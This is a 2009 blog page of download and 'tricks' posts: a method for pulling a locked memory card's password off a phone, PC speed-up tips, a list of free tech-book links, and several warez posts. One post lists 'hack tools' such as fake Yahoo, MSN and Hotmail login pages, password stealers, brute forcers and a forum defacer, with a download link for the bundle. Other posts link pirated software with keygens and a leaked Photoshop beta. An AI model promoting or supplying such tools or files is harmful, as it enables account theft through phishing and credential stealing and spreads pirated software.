Thursday, January 29, 2009

*** Crack PassWord Of MMC Without Any Software ***

0 comments
Follow the Steps

1. Install the File explorer Software e.g. SELQ of Fileman thru data Cable or Bluetooth in Phone memory

2. Then Insert The Blocked MMC

3. Open the File Explorer Software

4. goto C:\ i.e Phone Memory

5. goto System

6. Goto Find and Search MMcstore

7 Send this file by Bluetooth or Infraread to your PC

8 Rename the file MMCSTORE to MMCSTORE.TXT

9 pen the file and the password off the MMC are there
------------------------------------------------------------------------------

Friday, January 16, 2009

*** [TUT] Make Your Pc Faster, Guaranteed, 20 TIPS NEW ONES. ***

1 comments
1. First, run a scandisk or checkdisk. Let Windows fix any errors.

2. Run a disk cleanup utility...this will flush your temporary internet folder, trash can, temp system files, etc.

3. Delete any garbage files or data...if possible, run a Duplicate File Finder program.

4. Run Defrag on all partitions (NOTE: run this after you have deleted all trash and excess files!)

5. Run a registry cleaner utility and delete or get rid of any orphaned entries in that registry.

6. Check your exisiting swap file for it's size and location (*will explain location later in the post). If you have alot of ram (i.e. 1 gig and over) set this swap file to something small, like 250 mb. The reason is that this will force Windows to load more into memory, resulting in faster performance (note: some games and applications actually require a certain sized swap file so check your applications performance after making a size adjustment for any error messages.)

7. Under XP, you can tell Windows to use Classic Style on your desktop, - this will remove the neat single click and internet-style desktop but for lower end systems this will improve performance in other areas, such as gaming and multi-tasking.

8. Run msconfig and under startup and only keep the programs that are essential to load in the tray icon (and hence stay resident in memory). Uncheck anything else non-essential, like an ATI or Nvidia control panel, Quicktime utility, Real Audio, etc.

9. Upgrade drivers! Check for the latest BIOS, video, motherboard, sound, etc drivers from the manufacturers. Alot of my friends had chipsets on their motherboard that had advanced disk management capabilities or AGP port settings but the drivers weren't loaded for them so they were never being used. A simple upgrade realized a noticeable difference. For instance, they didn't have the latest driver for their AGP port so it was set to 1x, instead of being used at 4x!

10. (OK, so this won't speed up your PC but it could save you alot of time and trouble later on!) After making all these improvements, make a working backup! I use Ghost, but for XP users you can also use System Restore...

-FOR ADVANCED USERS-

1. Take a look under the hood (for IDE owners). How are your IDE devices configured? If you have more than 1 hard drive, put the master hard drive on the primary IDE channel and the secondary hard drive on the secondary IDE channel (most motherboards have two IDE channels).

2. Place all CDROM drives, DVD readers etc. on the secondary IDE channel (or SCSI bus, etc). This will reduce I/O contention with your master hard drive which should have your OS and apps installed...

3. Remember when I mentioned the location of the swap file? OK, if you have 2 hard drives and you have one on the primary IDE channel and the other on the secondary IDE channel, move the swap file to a partition ON THE SECOND hard drive (on the secondary IDE channel). This will greatly improve system performance as the PC can write to the swap file while loading and running OS and system commands without I/O contention on the primary IDE channel!

4. Take a look under the hood (for SCSI owners) What kind of SCSI do you have? If it's the newer Ultra 160/320 etc cards then guess what? Any devices placed on the same bus will automatically default to the slowest drive on the chain...this means that if you have say, an Ultra 160 SCSI card, and it has an Ultra 160 drive (capable of transferring 160 mb/sec) on the same chain as a SCSI cdrom drive (capable of only 40 mb/sec) then the whole bus slows down to the 40 mb/sec speed...use different chains for the slower devices and maximize those hard drives!

5. Run a utility like WCPUID and check the settings...is your CPU/front speed bus/AGP port running as fast as they should be? If not, check your drivers and BIOS configuration options. Also, are all of your chipset features enabled? If not, then enable them! (usually done in your BIOS!)

6. Dig in to the BIOS...check settings like boot order, for example...is it checking the floppy first? Change this! Select your order to reflect the hard drive first, then CD, then floppy for a noticeable boot time improvement. Also disable any non-used on board peripherals...for instance, - does your motherboard come with an on-board NIC card? Guess what, if you don't use that NIC card and it is enabled it will eat up valuable CPU cycles and can be detrimental to your systems' performance. DISABLE THAT MUTHA! Also, see if you can play with memory timing and CPU clock frequencies (NOTE! This is for expert users only!) Set these timings to "Aggressive" and see what happens in your games and apps...Also, check to see what your video aperature is set to. If you have a video card with 128 megs of on-baord memory, your aperature should be set to this amount too. Read the BIOS owner manual for further non-general performance tricks or improvements! Do you have the latest BIOS firmware version?

7. Under hardware properties, check to see that everything is working properly, and fix any hardware contention issues. You'll see the dreaded yellow exclamation point (!) beside any hardware componenet that is not working correctly.

8. Evaluate the potential for system/hardware upgrades...usually, the best bang for the buck is adding memory so buy all that you can afford (don't go much above 512 megs for Win 98 or ME). If you have a motherboard with an 8x - capable AGP port but you are using an older 4x video card, consider upgrading to an 8x card. You get the idea here...

9. Quit using software pigs like Norton system utilities, etc. These place files everywhere and can be a real system resource hog on lower end PCs.

10. Did I mention to make a good backup? Do it now! Also, while you're at it, run a good virus program with the latest definitions.

There are more options to make your system faster, such as overclocking, etc. but (just about) everything I've mentioned in this tech post costs you nothing and will result in faster system performance! Good luck and if you have any questions on how to do anything mentioned here, ask a knowledgeable friend or consult a book, - don't mess up something trying to do something you are not sure of!

*** Hack toolzZ ***

1 comments
Fake Yahoo! Messenger Login Screen
Fake MSN Messenger Version 7
Fake MSN Messenger Version 5.0
Fake MSN Messenger Version 4.6
Fake Hotmail Login Screen
Saria Fake Logins 2.0
Fake Login Hotmail
AOLKicker V.1.0.0
Fake Webpages 1
Fake Webpages 2
B-S Spy

MSN Chat Monitor and Sniffer
MSN Password Retriever
Head **** Hotmail Hack
HotmailHacker XEdition
Give me your pass V1.0
Hotmail Hacker Final
Hotmail Hacker Gold
MSN Spy Lite v1.0
MSN Sniffer v1.2
MSN Hacker DUC
MSN passwords
Hotmail Hacker
Hotmail Hack
MSN Flooder
Hotmail Brute Force
MSN Password Finder v2.0
MSN Password Grabber v1.0
Hack MSN Password
Hack Hotmail Evolution
MessenPass 1.02
HotmailHack!
Icecold REloaded
Hotmail Killer 2
NukeMSN v1.5
Hot Freeze v1.6
Hotmail Killer
MSN Locker
Magic -PS

Yahoo Password Retrieval
Yahoo Password Stealer
S-H Y! Pass Sender
Yahoo Cracker
Yahoo Booter
YahooHack!
Yacam

Skinner v1.2
MSN Bomberman v3
Ultimate Nickpopupz
MSN 7 Universal Patcher
Emoticons Creator v1.1
Anti Status Bomb
Proyect Lithium
MSN Detector 2.0
Multi MSN Loader
MSN Dondurucu
MSN Virus Cleaner
MSN Auto Responder
MSN Blockchecker
TrayIt!
Kitle

Network Password Recovery
NetBIOS Name Scanner
FTP Password Hacker
Cable Modem Sniffer
Port Listener XP
Blueport Scanner
FTP Brute Forcer
Angry IP Scanner
PhpBB Defacer
NetRes View
Whois Domain
Domain Scan
Fast Resolver
Port Scanner
SniffPass
XP -Killer
www2ip
PortSage
Hook-TooLbOX
Remote Anything
Smart-Hack Uploader
PhpBB Attacker



20nsy58omb6hjpuxmf3.png

http://rapidshare.com/files/100124403/MSN_...Hackz__AIO_.rar

------------------------------------------------------------------------------------------------

Wednesday, January 14, 2009

*** 250+ Tech books online ***

0 comments
250+ Tech books online

1
10 minute guide to lotus notes mail 4.5
http://www.parsian.net/set1252/pages/books.htm

2
10 minute guide to Microsoft exchange 5.0
http://www.parsian.net/set1252/pages/books.htm

3
10 minute guide to outlook 97
http://www.parsian.net/set1252/pages/books.htm

4
10 minute guide to schedule+ for windows 95
http://www.parsian.net/set1252/pages/books.htm

5
ActiveX programming unleashed
http://www.parsian.net/set1252/pages/books.htm

6
ActiveX programming unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

7
Advanced perl programming
http://www.hk8.org/old_web/

8
Advanced PL/SQL programming with packages
http://www.hk8.org/old_web/

9
Adventure in Prolog/AMZI
www.oopweb.com

10
Algorithms CMSC251/Mount, David
www.oopweb.com

11
Alison Balter's Mastering Access 95 development, premier ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

12
Apache : The definitive guide, 3rd.ed.
http://www.hk8.org/old_web/

13
Beej's guide to network programming/Hall, Brain
www.oopweb.com

14
Beyond Linux from Scratch/BLFS Development Team
http://book.onairweb.net/computer/os/linux...x_From_Scratch/

15
Borland C++ builder unleashed
http://www.parsian.net/set1252/pages/books.htm

16
Building an intranet with windows NT 4
http://www.parsian.net/set1252/pages/books.htm

17
Building an Intranet with Windows NT 4
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

18
Building expert systems in prolog/AMZI
www.oopweb.com

19
C programming language
http://book.onairweb.net/computer/pl/C/The...age_by_K&R/

20
C Programming/Holmes, Steven
www.oopweb.com

21
C++ Annotations
www.oopweb.com

22
CGI developer's guide
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

23
CGI manual of style
http://www.parsian.net/set1252/pages/books.htm

24
CGI manual of style online
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

25
CGI programming
http://www.hk8.org/old_web/

26
CGI programming unleashed
http://www.parsian.net/set1252/pages/books.htm

27
CGI programming with Perl, 2nd.ed.
http://www.hk8.org/old_web/

28
Charlie Calvert's Borland C++ builder unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

29
Client/server computing, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

30
Client-server computing, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

31
Common LISP, the language/Steele, Guy
www.oopweb.com

32
Compilers and compiler generators : an introduction with C++/Terry, P.D.
www.oopweb.com

33
Complete idiot's guide to creating HTML webpage
http://www.parsian.net/set1252/pages/books.htm

34
Computer graphics CMSC 427/Mount, David
www.oopweb.com

35
Configuring and troubleshooting the windows NT/95 registry
http://www.parsian.net/set1252/pages/books.htm

36
Creating commercial websites
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

37
Creating web applets with Java
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

38
Crystal Reports.NET
http://www.crystalreportsbook.com/Chapters.asp

39
Curious about the internet
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

40
Curious about the internet?
http://www.parsian.net/set1252/pages/books.htm

41
Dan appleman's developing activeX components with Visual Basic 5
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

42
Dan appleman's developing activex components with Visual Basic 5.0
http://www.parsian.net/set1252/pages/books.htm

43
Data structures CMSC420/Mount, David
www.oopweb.com

44
Database developer's guide with visual basic 4, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

45
Database developer's guide with Visual Basic 4, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

46
Database developer's guide with Visual C++ 4, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

47
Database developer's guide with Visual C++ 4, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

48
Design and analysis of computer algorithms CMSC451/Mount, David
www.oopweb.com

49
Designing implementing Microsoft internet information server
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

50
Designing implementing Microsoft proxy server
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

51
Developing for netscape one
http://www.parsian.net/set1252/pages/books.htm

52
Developing intranet applications with java
http://www.parsian.net/set1252/pages/books.htm

53
Developing personal oracle 7 for windows 95 applications
http://www.parsian.net/set1252/pages/books.htm

54
Developing personal Oracle 7 for windows 95 applications
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

55
Developing professional java applets
http://www.parsian.net/set1252/pages/books.htm

56
Developing professional java applets
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

57
DNS and BIND
http://www.hk8.org/old_web/

58
Doing objects with VB.NET and C#
http://vbwire.com/nl?6814

59
EAI/BPM Evaluation Series: IBM WebSphere MQ Workflow v3.3.2 & EAI Suite by
> Middleware Technology Evaluation Series, Phong Tran & Jeffrey Gosper
http://www.cmis.csiro.au/mte/reports/BPM_I...sphereMQ332.htm

60
Effective AWK programming
http://book.onairweb.net/computer/os/shell...WK_Programming/

61
Enterprise javabeans, 2nd.ed.
http://www.hk8.org/old_web/

62
Exploring java
http://www.hk8.org/old_web/

63
GNOME/Sheets, John
www.oopweb.com

64
Graph theory/Prof. Even
www.oopweb.com

65
Hacking java
http://www.parsian.net/set1252/pages/books.htm

66
How intranets work
http://www.parsian.net/set1252/pages/books.htm

67
How intranets work
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

68
How to program visual basic 5.0
http://www.parsian.net/set1252/pages/books.htm

69
How to use HTML 3.2
http://www.parsian.net/set1252/pages/books.htm

70
Html : The definitive guide
http://www.hk8.org/old_web/

71
HTML 3.2 & CGI unleashed
http://www.parsian.net/set1252/pages/books.htm

72
HTML 3.2 and CGI professional reference edition unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

73
HTML by example
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

74
Internet firewall
http://www.hk8.org/old_web/

75
Intranets unleashed
http://www.parsian.net/set1252/pages/books.htm

76
Introduction to object-oriented programming using C++/Muller, Peter
www.oopweb.com

77
Introduction to programming using Java/Eck, David
www.oopweb.com

78
Introduction to socket programming
http://book.onairweb.net/computer/network/...et_Programming/

79
Java 1.1 unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

80
Java 1.1 unleashed, 2nd.ed.
http://www.parsian.net/set1252/pages/books.htm

81
Java 1.1 unleashed, 3rd.ed.
http://www.parsian.net/set1252/pages/books.htm

82
Java 114 documentation
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

83
Java AWT reference
http://www.hk8.org/old_web/

84
Java by example
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

85
Java developer's guide
http://www.parsian.net/set1252/pages/books.htm

86
Java developer's guide
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

87
Java developer's reference
http://www.parsian.net/set1252/pages/books.htm

88
Java developer's reference
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

89
Java Distributed computing
http://www.hk8.org/old_web/

90
Java enterprise
http://www.hk8.org/old_web/

91
Java enterprise in a nutshell
http://www.hk8.org/old_web/

92
Java foundation classes in a nutshell
http://www.hk8.org/old_web/

93
Java fundamental classes reference
http://www.hk8.org/old_web/

94
Java in a nutshell
http://www.hk8.org/old_web/

95
Java in a nutshell, 3rd.ed.
http://www.hk8.org/old_web/

96
Java language reference
http://www.hk8.org/old_web/

97
Java security
http://www.hk8.org/old_web/

98
Java servlet programming
http://www.hk8.org/old_web/

99
Java unleashed
http://www.parsian.net/set1252/pages/books.htm

100
Java unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

101
Java, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

102
_JavaScript : the definitive guide
http://www.hk8.org/old_web/

103
_Javascript manual of style
http://www.parsian.net/set1252/pages/books.htm

104
_Javascript manual of style
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

105
Josh's GNU Linux Guide/Joshua
http://book.onairweb.net/computer/os/linux...NU_Linux_Guide/

106
Late night activex
http://www.parsian.net/set1252/pages/books.htm

107
Late night activeX
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

108
Laura lemay's 3D graphics in and VRML 2
http://www.parsian.net/set1252/pages/books.htm

109
Laura lemay's activex and _VBScript
http://www.parsian.net/set1252/pages/books.htm

110
Laura lemay's graphics and web page design
http://www.parsian.net/set1252/pages/books.htm

111
Laura lemay's guide to sizzling websites design
http://www.parsian.net/set1252/pages/books.htm

112
Laura lemay's _javascript 1.1
http://www.parsian.net/set1252/pages/books.htm

113
Laura lemay's web workshop activex and _VBScript
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

114
Laura lemay's web workshop Graphics web page design
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

115
Laura lemay's web workshop _javascript
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

116
Learning perl
http://www.hk8.org/old_web/

117
Learning perl on win32
http://www.hk8.org/old_web/

118
Learning the kornshell
http://www.hk8.org/old_web/

119
Learning unix
http://www.hk8.org/old_web/

120
Learning vi
http://www.hk8.org/old_web/

121
Linux from Scratch/Beekmans, Gerard
http://book.onairweb.net/computer/os/linux...x_From_Scratch/

122
Linux in a nutshell, 3rd.ed.
http://www.hk8.org/old_web/

123
Linux kernel/Rusling, David
www.oopweb.com

124
Linux network administrator's guide/Dawson, Terry
www.oopweb.com

125
Linux system administrator's survival guide
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

126
MAPI, SAPI and TAPI developer's guide
http://www.parsian.net/set1252/pages/books.htm

127
Mastering access 95 development
http://www.parsian.net/set1252/pages/books.htm

128
Microsoft access 97 quick reference
http://www.parsian.net/set1252/pages/books.htm

129
Microsoft access 97 quick reference
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

130
Microsoft backoffice 2 unleashed
http://www.parsian.net/set1252/pages/books.htm

131
Microsoft excel 97 quick reference
http://www.parsian.net/set1252/pages/books.htm

132
Microsoft excel 97 quick reference
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

133
Microsoft exchange server survival guide
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

134
Microsoft frontpage unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

135
Microsoft word 97 quick reference
http://www.parsian.net/set1252/pages/books.htm

136
Microsoft word 97 quick reference
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

137
Microsoft works 4.5 6-In-1
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

138
More than 100 full-text e-books
http://www.allfreetech.com/EBookCategory.asp

139
Ms backoffice administrator's survival guide
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

140
Ms backoffice unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

141
Mysql and msql
http://www.hk8.org/old_web/

142
Netscape plug-ins developer's kit
http://www.parsian.net/set1252/pages/books.htm

143
Official gamelan java directory
http://www.parsian.net/set1252/pages/books.htm

144
Oracle built-in packages
http://www.hk8.org/old_web/

145
Oracle PL/SQL built-in pocket reference
http://www.hk8.org/old_web/

146
Oracle PL/SQL language pocket reference
http://www.hk8.org/old_web/

147
Oracle PL/SQL programming guide to Oracle 8 features
http://www.hk8.org/old_web/

148
Oracle PL/SQL programming, 2nd.ed.
http://www.hk8.org/old_web/

149
Oracle unleashed
http://www.parsian.net/set1252/pages/books.htm

150
Oracle unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

151
Oracle web applications PL/SQL developer's introduction
http://www.hk8.org/old_web/

152
Patterns of enterprise application architecture/Fowler, Martin
http://www.awprofessional.com/catalog/prod...8-02E59CA7482D}

153
PC week : the intranet advantage
http://www.parsian.net/set1252/pages/books.htm

154
Perl 5 by example
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

155
Perl 5 quick reference
http://www.parsian.net/set1252/pages/books.htm

156
Perl 5 unleashed
http://www.parsian.net/set1252/pages/books.htm

157
Perl 5.0 CGI web pages
http://www.parsian.net/set1252/pages/books.htm

158
Perl cookbook
http://www.hk8.org/old_web/

159
Perl for system administration
http://www.hk8.org/old_web/

160
Perl in a nutshell
http://www.hk8.org/old_web/

161
Perl quick reference
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

162
Peter norton's complete guide to windows NT 4 workstations
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

163
Presenting activex
http://www.parsian.net/set1252/pages/books.htm

164
Presenting activex
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

165
Presenting javabeans
http://www.parsian.net/set1252/pages/books.htm

166
Presenting javabeans
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

167
Programming perl
http://www.hk8.org/old_web/

168
Programming perl, 3rd.ed.
http://www.hk8.org/old_web/

169
Programming the Perl DBI
http://www.hk8.org/old_web/

170
Red hat linux unleashed
http://www.parsian.net/set1252/pages/books.htm

171
Running a perfect intranet
http://www.parsian.net/set1252/pages/books.htm

172
Running Linux, 3rd.ed.
http://www.hk8.org/old_web/

173
Sams teach yourself java 1.1 in 24 hours/
http://book.onairweb.net/computer/sams/Sam...ing_in_24_Hours

174
Sams Teach yourself java in 21 days/Lemay, Laura
http://book.onairweb.net/computer/sams/Sam...ava_in_21_Days/

175
Sams teach yourself linux in 24 hours/Ball, Bill
http://book.onairweb.net/computer/sams/Sam..._in_24%20Hours/

176
Sams teach yourself shell programming in 24 hours
http://book.onairweb.net/computer/sams/Sam...ng_in_24_Hours/

177
Sams teach yourself TCP/IP in 14 days
http://book.onairweb.net/computer/sams/Sam...in_14_Days(SE)/

178
Sed and awk
http://www.hk8.org/old_web/

179
Sendmail
http://www.hk8.org/old_web/

180
Sendmail desktop reference
http://www.hk8.org/old_web/

181
Slackware linux unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

182
Special edition using java, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

183
Special edition using _javascript
http://www.parsian.net/set1252/pages/books.htm

184
Special edition using _javascript
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

185
Special edition using _Jscript
http://www.parsian.net/set1252/pages/books.htm

186
Special edition using lotus notes and domino 4.5
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

187
Special edition using Microsoft SQL server 6.5, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

188
Special edition using Microsoft visual Interdev
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

189
Special edition using perl 5 for web programming
http://www.parsian.net/set1252/pages/books.htm

190
Special edition using perl for web programming
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

191
Special edition using Visual Basic 4
http://www.parsian.net/set1252/pages/books.htm

192
TCP/IP
http://www.hk8.org/old_web/

193
Teach yourself activex programming in 21 days
http://www.parsian.net/set1252/pages/books.htm

194
Teach yourself C++ in 21 days
http://www.parsian.net/set1252/pages/books.htm

195
Teach yourself C++ in 21 days
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

196
Teach yourself CGI programming with Perl 5 in a week
http://www.parsian.net/set1252/pages/books.htm

197
Teach yourself database programming with VB5 in 21 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

198
Teach yourself database programming with visual basic 5 in 21 days
http://www.parsian.net/set1252/pages/books.htm

199
Teach yourself HTML 3.2 in 24 hours
http://www.parsian.net/set1252/pages/books.htm

200
Teach yourself HTML 3.2 in 24 hours
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

201
Teach yourself internet game programming with java in 21 days
http://www.parsian.net/set1252/pages/books.htm

202
Teach yourself java 1.1 programming in 24 hours
http://www.parsian.net/set1252/pages/books.htm

203
Teach yourself jave in café in 21 days
http://www.parsian.net/set1252/pages/books.tm

204
Teach yourself Microsoft visual Interdev in 21 days
http://www.parsian.net/set1252/pages/books.htm

205
Teach yourself Microsoft visual Interdev in 21 days
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

206
Teach yourself oracle 8 in 21 days
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

207
Teach yourself perl 5 in 21 days
http://www.parsian.net/set1252/pages/books.htm

208
Teach yourself perl 5 in 21 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

209
Teach yourself SQL in 21 days
http://www.parsian.net/set1252/pages/books.htm

210
Teach yourself SQL in 21 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

211
Teach yourself TCP/IP in 14 days
http://www.parsian.net/set1252/pages/books.htm

212
Teach yourself TCP/IP in 14 days, 2nd.ed.
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

213
Teach yourself the Internet in 24 hours
http://www.parsian.net/set1252/pages/books.htm

214
Teach yourself the internet in 24 hours
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

215
Teach yourself _VBScript in 21 days
http://www.parsian.net/set1252/pages/books.htm

216
Teach yourself _VBScript in 21 days
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

217
Teach yourself visual basic 5 in 24 hours
http://www.parsian.net/set1252/pages/books.htm

218
Teach yourself Visual Basic 5 in 24 hours
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

219
Teach yourself Visual J++ in 21 days
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

220
Teach yourself web publishing with HTML 3.2 in 14 days
http://www.parsian.net/set1252/pages/books.htm

221
Teach yourself web publishing with HTML in 14 days
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

222
Thinking in C++
http://www.mindview.net/Books

223
Thinking in C++/Eckel, Bruce - Vol.I, 2nd.ed.
www.oopweb.com

224
Thinking in C++/Eckel, Bruce - Vol.II, 2nd.ed.
www.oopweb.com

225
Thinking in Enterprise Java
http://www.mindview.net/Books

226
Thinking in Java, 2nd.ed.
www.oopweb.com

227
Thinking in Java, 3rd.ed. (pdf)
http://www.mindview.net/Books

228
Tricks of the internet gurus
http://www.parsian.net/set1252/pages/books.htm

229
Tricks of the java programming gurus
http://www.parsian.net/set1252/pages/books.htm

230
Unix and internet security
http://www.hk8.org/old_web/

231
Unix hints and hacks/Waingrow, Kirk
http://book.onairweb.net/computer/os/unix/...s/19270001..htm

232
Unix in a nutshell
http://www.hk8.org/old_web/

233
Unix kornshell quick reference
http://book.onairweb.net/computer/os/shell.../kornShell.html

234
Unix power tools
http://www.hk8.org/old_web/

235
Unix shell guide
http://book.onairweb.net/computer/os/shell...IX_Shell_Guide/

236
Unix unleashed
http://www.parsian.net/set1252/pages/books.htm

237
Unix unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

238
Unix unleashed Internet Ed./Burk, Robin
http://book.onairweb.net/computer/os/unix/...Edition)/fm.htm

239
Unix unleashed, System administrator's Edition
http://book.onairweb.net/computer/os/unix/...Edition/toc.htm

240
Unix Unleashed/Sams Publication
http://book.onairweb.net/computer/os/unix/...UNIX_Unleashed/

241
Upgrading PCs illustrated
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

242
Using windows NT workstation 4.0
http://www.parsian.net/set1252/pages/books.htm

243
_VBScript unleashed
http://www.parsian.net/set1252/pages/books.htm

244
_Vbscript unleashed
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

245
Visual basic 4 in 12 easy lessons
http://www.parsian.net/set1252/pages/books.htm

246
Visual basic 4 unleashed
http://www.parsian.net/set1252/pages/books.htm

247
Visual Basic 5 night school
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

248
Visual basic programming in 12 easy lessons
http://www.parsian.net/set1252/pages/books.htm

249
Visual Basic programming in 12 easy lessons
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

250
Visual C++ 4 unleashed
http://www.parsian.net/set1252/pages/books.htm

251
Visual C++ programming in 12 easy lessons
http://www.parsian.net/set1252/pages/books.htm

252
Web database developer's guide with visual basic 5
http://www.parsian.net/set1252/pages/books.htm

253
Web database developer's guide with visual basic 5
http://www.emu.edu.tr/english/facilitiesse...enter/bookslib/

254
Web programming desktop reference 6-in-1
http://www.parsian.net/set1252/pages/books.htm

Tuesday, January 13, 2009

*** File Compress 2 ***

0 comments
FileCompress is a software that allows you compress any files.
To these you have to add the features that the FileCompress offers as an user friendly and modern interface, a shell context menu, the possibility to create customizeable SFX (Self-extracting archives), the preview of the files through the creation of file and virtual folder and the support for v0.6 and v0.4 Uharc archives.
Here are some key features of "FileCompress":
· New Toolbar
· UHARC 0.6 and 0.4 Support
· Shell Extensions
· Shell Context Menu
· SFX customizeable
· Exclude the selected file types from extracting
· Extract only the selected file types
· Exclude the selected File types from adding
· Add only the selected file types
What's New in This Release:
· Added the possibility to minimize the program to tray when it works
· Better shell windows integration
· Now you can extract a single folder not only single file
· Added the possibility to choose different kind of file visualization
· Implemented the verify function of an archive
· Possibility to check the version
· Important bugs fixed

CODE
http://rapidshare.com/files/152815274/File_Compress_v2.0_TDW.rar

Pass: www.thedarkwarez.com
OR
CODE
http://rapidshare.com/files/145655985/FileComp.rar

Pass: luvthunder


------------------------------------------------------------------------------------------

*** Guitar softwares ***

0 comments
Cakewalk Guitar Tracks Pro v3

Guitar Tracks Pro 3 provides recording guitarists and songwriters with all the professional tools necessary to create quality music productions using their home computer.

CODE
http://rapidshare.com/files/21760700/CakeW_sonsuz.rar

Guitar Chord Buster Pro 4.4

Guitar Chord Buster Pro is a play learn guitar chord software in a computer with the world’s largest guitar chord Encyclopaedia over 302,300 guitar chords in standard tuning, it is a guitar represented in a computer.

CODE
http://rapidshare.com/files/169144789/Guitar_Chord_Buster_Pro_4.4.rar

Guitar Pro 5.2

Guitar Pro is a multitrack tablature editor for guitar, banjo and bass. Besides writing scores, Guitar Pro is a useful resource for guitarists from beginner to experienced levels to progress, compose, or simply accompany themselves.

CODE
http://rapidshare.com/files/168282629/Guitar-Pro-5.2_and_Keygen.rar

pass: www.atomic-warez.com

Ultrawave Guitar Multi FX.v1.3
Guitar Multi FX program is a low latency realtime software Guitar effects processor, that can add effects such as Chorus, Flanger, Echo, Reverb + many more to live Guitar sound.
http://rapidshare.com/files/160922497/Ultr...Master.rar.html
Guitar FX BOX v2.6
The program allows to create different effects (efo, distorshn, feyzer) with in a number of options. Also with its help you will be able to adjust a guitar through a computer. Beautiful, comfortable interface. Intended for electric guitars.

CODE
http://letitbit.net/download/c30ecc397340/guitar-fx-box-2-6.rar.html


---------------------------------------------------------------------------------------

*** PDF to WORD ***

0 comments
CODE
http://rapidshare.com/files/178628644/PDF_to_WORD.rar


---------------------------------------------------------------------------------------------------

*** ImTOO iPod Software Pack 2.0.86.0128 ***

0 comments
ImTOO iPod Software Pack 2.0.86.0128


DOWNLOAD:

CODE:
http://rapidshare.com/files/111570346/iPod...yware_Pack_.rar

Password: kurdsportal.com


------------------------------------------------------------------------------------

*** Adobe Photoshop CS4 ***

0 comments
Adobe Photoshop CS4 is a leaked version from Adobe,
which is currently in Beta stage.
This package includes all features plus a working keygenerator.

The Adobe Photoshop family of products is the ultimate playground
for bringing out the best in your digital images and transforming them
into anything you can imagine.

Size: 434MB

http://rapidshare.com/files/123595528/APSC...nload.part1.rar .
http://rapidshare.com/files/123595501/APSC...nload.part2.rar .
http://rapidshare.com/files/123604991/APSC...nload.part3.rar .
